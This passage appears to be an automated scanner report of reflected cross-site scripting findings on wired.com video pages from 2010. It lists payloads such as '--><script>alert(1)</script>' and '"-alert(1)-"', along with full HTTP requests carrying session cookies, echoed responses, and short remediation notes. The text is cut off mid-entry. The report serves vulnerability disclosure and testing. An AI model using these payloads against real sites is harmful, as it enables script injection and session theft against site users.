GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows417f2"-alert(1)-"53afbfa2f39/650875857001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:49:29 GMT Date: Mon, 22 Nov 2010 00:44:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40b82"-alert(1)-"5c1018b5684 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/behind-the-scenes-of-harry-potter-and-the-deathly-hallows/65087585700140b82"-alert(1)-"5c1018b5684 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:49:44 GMT Date: Mon, 22 Nov 2010 00:44:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... t/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload bae29--><script>alert(1)</script>d1b8c531380 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videobae29--><script>alert(1)</script>d1b8c531380/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29459 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videobae29--><script>alert(1)</script>d1b8c531380/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef811"><a>b1ea23f2dd6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoef811"><a>b1ea23f2dd6/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29420 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:50 GMT Date: Mon, 22 Nov 2010 00:35:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoef811"><a>b1ea23f2dd6 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c265"-alert(1)-"61910eb5ad7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos9c265"-alert(1)-"61910eb5ad7/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=272 Expires: Mon, 22 Nov 2010 00:41:55 GMT Date: Mon, 22 Nov 2010 00:37:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154f4"><a>d2d236a0fa9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos154f4"><a>d2d236a0fa9/latest/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106741
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos154f4"><a>d2d236a0fa9 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ed5fe"><a>50a1865d9c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latested5fe"><a>50a1865d9c9/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:25 GMT Date: Mon, 22 Nov 2010 00:37:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106766
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latested5fe"><a>50a1865d9c9"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf068"-alert(1)-"1f8767402b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestbf068"-alert(1)-"1f8767402b1/1815816633/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:30 GMT Date: Mon, 22 Nov 2010 00:38:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5270b"-alert(1)-"b5f96d84bd1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/18158166335270b"-alert(1)-"b5f96d84bd1/call-of-duty--afghanistan/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:48 GMT Date: Mon, 22 Nov 2010 00:38:48 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc71f"-alert(1)-"d498532879a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/call-of-duty--afghanistanfc71f"-alert(1)-"d498532879a/664893966001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:18 GMT Date: Mon, 22 Nov 2010 00:39:18 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106752
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3463"-alert(1)-"374493d8e16 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/call-of-duty--afghanistan/664893966001e3463"-alert(1)-"374493d8e16 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:44:10 GMT Date: Mon, 22 Nov 2010 00:39:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106727
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7340c"><a>8892cc9fb2a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video7340c"><a>8892cc9fb2a/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29448 Vary: Accept-Encoding Cache-Control: max-age=282 Expires: Mon, 22 Nov 2010 00:38:56 GMT Date: Mon, 22 Nov 2010 00:34:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video7340c"><a>8892cc9fb2a ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 6cd9f--><script>alert(1)</script>ad403d2a150 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video6cd9f--><script>alert(1)</script>ad403d2a150/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29487 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:09 GMT Date: Mon, 22 Nov 2010 00:35:09 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video6cd9f--><script>alert(1)</script>ad403d2a150/latest-videos/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fed2d"><a>6a6f634c6a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videosfed2d"><a>6a6f634c6a7/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=296 Expires: Mon, 22 Nov 2010 00:40:06 GMT Date: Mon, 22 Nov 2010 00:35:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videosfed2d"><a>6a6f634c6a7 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17088"-alert(1)-"d5156ec131b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos17088"-alert(1)-"d5156ec131b/latest/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=287 Expires: Mon, 22 Nov 2010 00:41:10 GMT Date: Mon, 22 Nov 2010 00:36:23 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106798
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d11c7"-alert(1)-"40fba69b59c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestd11c7"-alert(1)-"40fba69b59c/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:27 GMT Date: Mon, 22 Nov 2010 00:37:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106808
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... "text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cf86"><a>178493caa5e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest5cf86"><a>178493caa5e/1815816633/cast-and-crew-talk-tron-reboot-secondskin-light-suits/678922783001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:41:19 GMT Date: Mon, 22 Nov 2010 00:36:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106723
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest5cf86"><a>178493caa5e"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0a45"-alert(1)-"19c3ad2c058 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
